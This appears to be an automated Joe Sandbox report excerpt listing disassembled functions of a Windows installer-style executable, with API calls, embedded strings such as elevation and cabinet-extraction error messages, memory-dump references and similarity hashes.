                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 0080033C
                                                                                                                                                              • GetComputerNameW.KERNEL32(?,?), ref: 00800394
                                                                                                                                                              Strings
                                                                                                                                                              • --- logging level: %hs ---, xrefs: 00800454
                                                                                                                                                              • === Logging started: %ls ===, xrefs: 008003BF
                                                                                                                                                              • Computer : %ls, xrefs: 00800402
                                                                                                                                                              • Executable: %ls v%d.%d.%d.%d, xrefs: 008003F0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Name$ComputerFileModule
                                                                                                                                                              • String ID: --- logging level: %hs ---$=== Logging started: %ls ===$Computer : %ls$Executable: %ls v%d.%d.%d.%d
                                                                                                                                                              • API String ID: 2577110986-3153207428
                                                                                                                                                              • Opcode ID: 7dba6d4164692d4e45d7ba60197779fad4a72acc7ae2d24ea7b2c03c134b68c9
                                                                                                                                                              • Instruction ID: 49675228910a57bd4f9d625fde1d95797e53b9befc5c6e4db09800a62f7f9c8e
                                                                                                                                                              • Opcode Fuzzy Hash: 7dba6d4164692d4e45d7ba60197779fad4a72acc7ae2d24ea7b2c03c134b68c9
                                                                                                                                                              • Instruction Fuzzy Hash: BF4163B2900118AFCB619F64ED45BAA77BCFB44304F4081A6F649E3182D6359E858FA9
                                                                                                                                                              Function 007DD437 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 120COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000001,0080B500,?,00000001,000000FF,?,?,75C0B390,00000000,00000001,00000000,?,007D74E6), ref: 007DD560
                                                                                                                                                              Strings
                                                                                                                                                              • elevation.cpp, xrefs: 007DD46B
                                                                                                                                                              • Failed to elevate., xrefs: 007DD542
                                                                                                                                                              • Failed to create pipe and cache pipe., xrefs: 007DD4BD
                                                                                                                                                              • UX aborted elevation requirement., xrefs: 007DD475
                                                                                                                                                              • Failed to create pipe name and client token., xrefs: 007DD4A1
                                                                                                                                                              • Failed to connect to elevated child process., xrefs: 007DD549
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                              • String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
                                                                                                                                                              • API String ID: 2962429428-3003415917
                                                                                                                                                              • Opcode ID: 75aef909a8f37ef2509bf06d5ec31693eefea8a08638f01ac578361452f7adfa
                                                                                                                                                              • Instruction ID: 10b51e3a34d60e03a57d9c1373ed5c9ee852d8c9a886606af93bab7c552ad4d3
                                                                                                                                                              • Opcode Fuzzy Hash: 75aef909a8f37ef2509bf06d5ec31693eefea8a08638f01ac578361452f7adfa
                                                                                                                                                              • Instruction Fuzzy Hash: A7315B72644621BBE73196A4DC4BFBAB37CEF00734F20420BF905E6381DB69AD5082D5
                                                                                                                                                              Function 0080159E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 117stringregistryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,00000000,00000000,BundleUpgradeCode), ref: 008015DA
                                                                                                                                                              • lstrlenW.KERNEL32(?,00000002,00000001,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 0080163C
                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 00801648
                                                                                                                                                              • RegSetValueExW.ADVAPI32(?,?,00000000,00000007,?,?,00000001,?,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 0080168B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen$Value
                                                                                                                                                              • String ID: BundleUpgradeCode$regutil.cpp
                                                                                                                                                              • API String ID: 198323757-1648651458
                                                                                                                                                              • Opcode ID: 6e7b99ce60fe40923ed9206ee330ebf5d8eae10ac5971c15bd68f7b02cc1b737
                                                                                                                                                              • Instruction ID: 3d297e31530d0ed510589667a87fc562cbe769a4d582d0c8b74ccc468f6c01a5
                                                                                                                                                              • Opcode Fuzzy Hash: 6e7b99ce60fe40923ed9206ee330ebf5d8eae10ac5971c15bd68f7b02cc1b737
                                                                                                                                                              • Instruction Fuzzy Hash: 0E41737290022AAFCF219F988C89EAEB7B8FF54760F050169FD11EB250D771DD118BA0
                                                                                                                                                              Function 00800523 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(0082B5FC,00000000,?,?,?,007D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,007C54FA,?), ref: 00800533
                                                                                                                                                              • CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,0082B5F4,?,007D4207,00000000,Setup), ref: 008005D7
                                                                                                                                                              • GetLastError.KERNEL32(?,007D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,007C54FA,?,?,?), ref: 008005E7
                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,007D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,007C54FA,?), ref: 00800621
                                                                                                                                                                • Part of subcall function 007C2DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 007C2F09
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0082B5FC,?,?,0082B5F4,?,007D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,007C54FA,?), ref: 0080067A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                                                                                                                              • String ID: logutil.cpp
                                                                                                                                                              • API String ID: 4111229724-3545173039
                                                                                                                                                              • Opcode ID: 1f7f7bcdb08b7cf4364a3b8173a023c62f3439ff5825b8b6fd2ba1a27ec361f7
                                                                                                                                                              • Instruction ID: 3baac1dc8a006a65edb02ea44ece75c048277a3184315b69ca67f0671615d0b2
                                                                                                                                                              • Opcode Fuzzy Hash: 1f7f7bcdb08b7cf4364a3b8173a023c62f3439ff5825b8b6fd2ba1a27ec361f7
                                                                                                                                                              • Instruction Fuzzy Hash: 9731E371A0172AFFCB615F609D45F6A7769FB10750F044228B921EA2E1D736CD609FA0
                                                                                                                                                              Function 007E398D Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 112COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • _MREFOpen@16.MSPDB140-MSVCRT ref: 007E39F4
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to format property value., xrefs: 007E3A7D
                                                                                                                                                              • Failed to escape string., xrefs: 007E3A76
                                                                                                                                                              • Failed to append property string part., xrefs: 007E3A68
                                                                                                                                                              • %s%="%s", xrefs: 007E3A27
                                                                                                                                                              • Failed to format property string part., xrefs: 007E3A6F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Open@16
                                                                                                                                                              • String ID: %s%="%s"$Failed to append property string part.$Failed to escape string.$Failed to format property string part.$Failed to format property value.
                                                                                                                                                              • API String ID: 3613110473-515423128
                                                                                                                                                              • Opcode ID: 93cffb428365adb7ed1fd149ba3a340cff9b072705d97701429e9afdfe8fa35b
                                                                                                                                                              • Instruction ID: add4680b4afc813a07d50f8b9bd8b72365c4efcddd95f40f4924087bbfea68c2
                                                                                                                                                              • Opcode Fuzzy Hash: 93cffb428365adb7ed1fd149ba3a340cff9b072705d97701429e9afdfe8fa35b
                                                                                                                                                              • Instruction Fuzzy Hash: 1D310532806169EFCB159E99CC4AEAEB778EF04714F00826EF811A7241D778AF50DB90
                                                                                                                                                              Function 008041E5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 101COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000101,?,0080432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,007DA063,00000001), ref: 00804203
                                                                                                                                                              • GetLastError.KERNEL32(00000002,?,0080432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,007DA063,00000001,000007D0,00000001,00000001,00000003), ref: 00804212
                                                                                                                                                              • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000001,00000000,?,0080432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,007DA063,00000001), ref: 008042A6
                                                                                                                                                              • GetLastError.KERNEL32(?,0080432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,007DA063,00000001,000007D0,00000001), ref: 008042B0
                                                                                                                                                                • Part of subcall function 00804440: FindFirstFileW.KERNEL32(007E923A,?,00000100,00000000,00000000), ref: 0080447B
                                                                                                                                                                • Part of subcall function 00804440: FindClose.KERNEL32(00000000), ref: 00804487
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$ErrorFindLastMove$CloseFirst
                                                                                                                                                              • String ID: \$fileutil.cpp
                                                                                                                                                              • API String ID: 3479031965-1689471480
                                                                                                                                                              • Opcode ID: 4bff8bf332daa2c5ccc788bada644bd08583a012c6e9495af8a9ee2641685c69
                                                                                                                                                              • Instruction ID: 499498539cb8282708bd375540835fa0c0020eba4c823c5e51e06779ccff2032
                                                                                                                                                              • Opcode Fuzzy Hash: 4bff8bf332daa2c5ccc788bada644bd08583a012c6e9495af8a9ee2641685c69
                                                                                                                                                              • Instruction Fuzzy Hash: F531E1B6B8123AEBDBB19E99CC00A6F7669FF91760B116039FE04DB294D3708C41C6D0
                                                                                                                                                              Function 007C732C Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 92COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,007C5932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 007C733E
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000000,00000000,00000100,00000000,?,?,?,007C5932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 007C741D
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to get variable: %ls, xrefs: 007C737F
                                                                                                                                                              • Failed to format value '%ls' of variable: %ls, xrefs: 007C73E7
                                                                                                                                                              • *****, xrefs: 007C73D9, 007C73E6
                                                                                                                                                              • Failed to get unformatted string., xrefs: 007C73AE
                                                                                                                                                              • Failed to get value as string for variable: %ls, xrefs: 007C740C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                              • String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls
                                                                                                                                                              • API String ID: 3168844106-2873099529
                                                                                                                                                              • Opcode ID: cded41f07248007ff030385156b74667a387fe3d992dca818c613b7a9e706014
                                                                                                                                                              • Instruction ID: 8bedb05d8cfca474cb25ac28eadb2e916e4362fea939d4d6ca6c252b8faade9e
                                                                                                                                                              • Opcode Fuzzy Hash: cded41f07248007ff030385156b74667a387fe3d992dca818c613b7a9e706014
                                                                                                                                                              • Instruction Fuzzy Hash: 50318D3290459AFBCF265E50CC09F9E7B64FF14361F10426DF810A6290DB79AA90EFD4
                                                                                                                                                              Function 007D8DEC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 78COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 007D8E37
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007D8E41
                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,?,00000000,00000000,?,?), ref: 007D8EA1
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to initialize ACL., xrefs: 007D8E6F
                                                                                                                                                              • cache.cpp, xrefs: 007D8E65
                                                                                                                                                              • Failed to allocate administrator SID., xrefs: 007D8E1D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesErrorFileInitializeLast
                                                                                                                                                              • String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$cache.cpp
                                                                                                                                                              • API String ID: 669721577-1117388985
                                                                                                                                                              • Opcode ID: 1168fc043a9b7d4cf4ad654b56ebcba52e34f65923f1b4f9cbac456abe62e4e3
                                                                                                                                                              • Instruction ID: b42b21462be4f0e07259e0d45345ec03a08c256cf3a93abb48303b0ac1d9637c
                                                                                                                                                              • Opcode Fuzzy Hash: 1168fc043a9b7d4cf4ad654b56ebcba52e34f65923f1b4f9cbac456abe62e4e3
                                                                                                                                                              • Instruction Fuzzy Hash: 8E21D832E40214F7DB619A959C46F9FB77DFF00B20F51416AB954FB380DA789D009A91
                                                                                                                                                              Function 007C4212 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,00000000,crypt32.dll,?,?,007D4028,00000001,feclient.dll,?,00000000,?,?,?,007C4B12), ref: 007C424D
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007D4028,00000001,feclient.dll,?,00000000,?,?,?,007C4B12,?,?,0080B488,?,00000001), ref: 007C4259
                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,?,?,00000000,?,?,007D4028,00000001,feclient.dll,?,00000000,?,?,?,007C4B12,?), ref: 007C4294
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007D4028,00000001,feclient.dll,?,00000000,?,?,?,007C4B12,?,?,0080B488,?,00000001), ref: 007C429E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CurrentDirectoryErrorLast
                                                                                                                                                              • String ID: crypt32.dll$dirutil.cpp
                                                                                                                                                              • API String ID: 152501406-1104880720
                                                                                                                                                              • Opcode ID: e56e74d0da9a75821fb4c96e97b29d24bdbc2526f0ed00d79308fc4dd0ace996
                                                                                                                                                              • Instruction ID: bdaa99abfac72eda93cf6045f758f50fd9ec774e809d58945c67062838f7e851
                                                                                                                                                              • Opcode Fuzzy Hash: e56e74d0da9a75821fb4c96e97b29d24bdbc2526f0ed00d79308fc4dd0ace996
                                                                                                                                                              • Instruction Fuzzy Hash: CB11A577E01637AB97315AD98856F5BBB98FF05760B11013DBE00E7350E728DC0096E0
                                                                                                                                                              Function 007E0B8E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to write during cabinet extraction., xrefs: 007E0C35
                                                                                                                                                              • cabextract.cpp, xrefs: 007E0C2B
                                                                                                                                                              • Unexpected call to CabWrite()., xrefs: 007E0BC1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastWrite_memcpy_s
                                                                                                                                                              • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
                                                                                                                                                              • API String ID: 1970631241-3111339858
                                                                                                                                                              • Opcode ID: 045038e87aceaca8c402fea3b6282462ad2e8deea827a22da9a76f06e21e49b9
                                                                                                                                                              • Instruction ID: 4e288af8cd365900f8799eb2ec1cf3aaca536af6c436317b2816a15369e3a236
                                                                                                                                                              • Opcode Fuzzy Hash: 045038e87aceaca8c402fea3b6282462ad2e8deea827a22da9a76f06e21e49b9
                                                                                                                                                              • Instruction Fuzzy Hash: E021FFB6501205ABCB14CF6EDC85DAA37A9FF88320B214259FE14C7351E6B9D9408BA0
                                                                                                                                                              Function 007C9AE0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 72COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • _MREFOpen@16.MSPDB140-MSVCRT ref: 007C9AFB
                                                                                                                                                              • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,00000000,?,007CA8B4,00000100,000002C0,000002C0,00000100), ref: 007C9B10
                                                                                                                                                              • GetLastError.KERNEL32(?,007CA8B4,00000100,000002C0,000002C0,00000100), ref: 007C9B1B
                                                                                                                                                              Strings
                                                                                                                                                              • Failed while searching directory search: %ls, for path: %ls, xrefs: 007C9B54
                                                                                                                                                              • Failed to set variable., xrefs: 007C9B7A
                                                                                                                                                              • Failed to format variable string., xrefs: 007C9B06
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                              • String ID: Failed to format variable string.$Failed to set variable.$Failed while searching directory search: %ls, for path: %ls
                                                                                                                                                              • API String ID: 1811509786-402580132
                                                                                                                                                              • Opcode ID: 7ba41b2ba6887a7e09191ad6c01a9120893a2ffac65c65ac9079388504e5a286
                                                                                                                                                              • Instruction ID: 5b7c4011f3e1003cf19705255e719fe10554dd122c989f542c605859fea93a48
                                                                                                                                                              • Opcode Fuzzy Hash: 7ba41b2ba6887a7e09191ad6c01a9120893a2ffac65c65ac9079388504e5a286
                                                                                                                                                              • Instruction Fuzzy Hash: 1D11D6B2940535FBDBA21E98AC4AF6EF728EF10770F10031DFA10A619087299D10E6D5
                                                                                                                                                              Function 007E0C57 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 007E0CC4
                                                                                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007E0CD6
                                                                                                                                                              • SetFileTime.KERNEL32(?,?,?,?), ref: 007E0CE9
                                                                                                                                                              • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,007E08B1,?,?), ref: 007E0CF8
                                                                                                                                                              Strings
                                                                                                                                                              • Invalid operation for this state., xrefs: 007E0C9D
                                                                                                                                                              • cabextract.cpp, xrefs: 007E0C93
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Time$File$CloseDateHandleLocal
                                                                                                                                                              • String ID: Invalid operation for this state.$cabextract.cpp
                                                                                                                                                              • API String ID: 609741386-1751360545
                                                                                                                                                              • Opcode ID: 498df3ee4aec0212970965e616082ae131456e7f1c4274d9f5477556031f4411
                                                                                                                                                              • Instruction ID: 18f34658ee472847e519b735a493eec2fbdd119f7dd3bba67bcbb71c5865ca06
                                                                                                                                                              • Opcode Fuzzy Hash: 498df3ee4aec0212970965e616082ae131456e7f1c4274d9f5477556031f4411
                                                                                                                                                              • Instruction Fuzzy Hash: 8921D572902619ABC710DFA9CD099FABBBCFF087207104216F864D65D0D3B8E991CBE0
                                                                                                                                                              Function 007D4A77 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,crypt32.dll,00000000,00000000,00000000,?,007D539D), ref: 007D4AC3
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to write message type to pipe., xrefs: 007D4B05
                                                                                                                                                              • Failed to allocate message to write., xrefs: 007D4AA2
                                                                                                                                                              • pipe.cpp, xrefs: 007D4AFB
                                                                                                                                                              • crypt32.dll, xrefs: 007D4A7D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
